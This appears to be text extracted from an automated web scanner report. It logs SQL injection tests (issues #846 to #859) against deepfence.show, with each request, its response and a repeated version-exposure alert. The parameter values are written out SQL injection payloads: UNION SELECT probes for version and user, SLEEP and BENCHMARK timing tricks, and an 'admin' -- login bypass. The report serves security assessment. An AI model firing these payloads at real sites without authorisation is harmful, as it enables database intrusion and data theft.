href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #846\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #847\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@\ndeepfence.io\"-\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #848\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT \n1,2,3,4,5,6,7,8\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #849\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioadmin' --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #850\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #851\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@deepfence.io\nCWE-ID CWE-89\nIssue Number #852\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('\nA')),4,5--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #853\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #854\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK\n(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #855Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io1) or sleep(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #856\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #857\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #858\nSQL InjectionScan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('\nA')),4,5,6\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #859\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AS INJECTX WHERE 1=1 AND 1=0#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget 